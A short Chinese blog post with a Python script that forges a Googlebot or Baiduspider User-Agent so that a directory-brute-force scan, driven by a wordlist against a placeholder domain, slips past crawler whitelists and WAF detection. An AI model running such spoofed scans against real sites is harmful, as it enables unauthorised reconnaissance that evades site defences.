爬虫白名单,在扫描的时候特别有用,伪造成爬虫,绕过检测。
自己写示例代码(有工具直接支持吗???):
我自己写的一个示例:
#coding: utf-8
import requests
headers = {
#'User-Agent':"Mozilla/5.0 (compatible;Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)"
'User-Agent':"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
}
domain = "http://XXX.com/"
with open("dicc.txt") as f:
for line in f:
path = line.strip()
url = domain + path
res = requests.get(url=url,headers=headers)
status = res.status_code
print("url:{} status:{}".format(url, status))
# print("response: ", res.text)
# break
标签:status,http,url,WAF,扫描,爬虫,headers,res,com From: https://blog.51cto.com/u_11908275/6386040